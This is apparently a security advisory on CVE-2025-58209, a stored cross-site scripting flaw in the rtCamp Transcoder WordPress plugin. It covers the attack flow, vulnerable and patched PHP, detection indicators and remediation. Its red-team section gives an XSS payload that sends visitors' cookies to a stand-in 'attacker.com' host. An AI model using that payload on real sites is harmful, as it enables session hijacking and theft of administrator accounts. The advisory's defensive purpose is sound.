CVE-2025-58209
Executive Summary
CVE-2025-58209 is a Stored Cross-Site Scripting (XSS) vulnerability in the rtCamp Transcoder WordPress plugin, affecting versions up to and including 1.4.0. This flaw allows an authenticated attacker with contributor-level privileges or higher to inject arbitrary web scripts into pages, which will execute whenever a user accesses the compromised page. The vulnerability stems from improper neutralization of input during web page generation. As a WordPress plugin issue, it does not affect the core Apache or Nginx server software. No public exploit code or proof-of-concept is currently available, and the patch status remains unknown.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users should monitor the plugin’s update channel and apply any security patches immediately upon release. Since the plugin is part of the WordPress ecosystem, supply chain risks include potential compromise of the plugin’s update server or malicious commits to the repository.
CVSS Breakdown & Threat Level
- CVSS Score: 6.5 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor-level WordPress user)
- User Interaction: Required (Victim must visit the compromised page)
- Scope: Changed (Impact may extend beyond the vulnerable component)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: Low
Threat Level: Medium. Exploitation requires authenticated access and user interaction, but the stored nature of the XSS can lead to persistent compromise of admin sessions or data theft.
Deep Dive & Mechanics
The vulnerability exists in the Transcoder plugin’s handling of user-supplied input when generating web pages. The plugin fails to sanitize or escape output, allowing an attacker to inject malicious JavaScript code. This code is stored in the database and executed in the browser of any user viewing the affected page.
Attack Flow:
- An attacker with contributor-level access or higher logs into WordPress.
- The attacker crafts a payload (e.g.,
<script>alert('XSS')</script>) and submits it via a vulnerable input field (e.g., a custom field, shortcode attribute, or settings page). - The plugin stores the payload without sanitization.
- When an administrator or other user visits the page, the payload executes in their browser.
- The attacker can then steal cookies, session tokens, or perform actions on behalf of the victim.
Root Cause: The plugin uses functions like echo or print without applying WordPress escaping functions such as esc_html() or wp_kses_post().
Vulnerable vs. Patched Code
Vulnerable Code (example):
<?php
// In a template or shortcode handler
echo $user_input; // No sanitization
?>
Patched Code (hypothetical):
<?php
// Properly escape output
echo esc_html( $user_input );
?>
Key Difference: The patched version uses esc_html() to convert special characters to HTML entities, preventing script execution.
Exploitation & Lab Setup
Red Team (Attack Simulation)
Prerequisites:
- WordPress instance with Transcoder plugin <= 1.4.0
- Contributor-level account or higher
Steps:
- Log in to WordPress as a contributor.
- Navigate to a page or post where the plugin accepts user input (e.g., a custom field).
- Inject the following payload into the input field:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save the page.
- Send the link to an administrator or wait for them to visit the page.
- The payload executes, sending the admin’s cookies to the attacker’s server.
Note: No public exploit code is available; this is a hypothetical demonstration.
Blue Team (Detection & Response)
Detection:
- Monitor for unusual JavaScript in page content.
- Use Web Application Firewall (WAF) rules to block common XSS patterns.
- Review WordPress logs for suspicious post/page edits.
Response:
- Immediately disable the Transcoder plugin if no patch is available.
- Remove malicious content from the database.
- Rotate all user session tokens and passwords.
- Conduct a forensic analysis to determine the scope of compromise.
Indicators of Compromise (IOCs)
File Indicators:
- Modified WordPress posts/pages containing
<script>tags. - Suspicious entries in the
wp_poststable withpost_contentcontaining JavaScript.
- Modified WordPress posts/pages containing
Network Indicators:
- Outbound connections to unknown domains from the WordPress server.
- HTTP requests containing
document.cookiein the query string.
Log Indicators:
- WordPress audit logs showing edits by low-privilege users to high-value pages.
- Web server logs with
%3Cscript%3E(URL-encoded<script>) in the request URI.

Remediation & Mitigation
Immediate Actions:
- Disable the Transcoder plugin until a patch is available.
- Apply a Web Application Firewall (WAF) rule to block
<script>tags in POST requests to plugin endpoints. - Review and sanitize all existing content created by low-privilege users.
Long-term Fix:
- The vendor (rtCamp) must release a patched version that properly escapes output using WordPress functions like
esc_html(),esc_attr(), orwp_kses_post(). - Users should update to the latest version as soon as it becomes available.
Workaround:
- If the plugin cannot be disabled, restrict contributor-level access and implement Content Security Policy (CSP) headers to mitigate XSS impact.
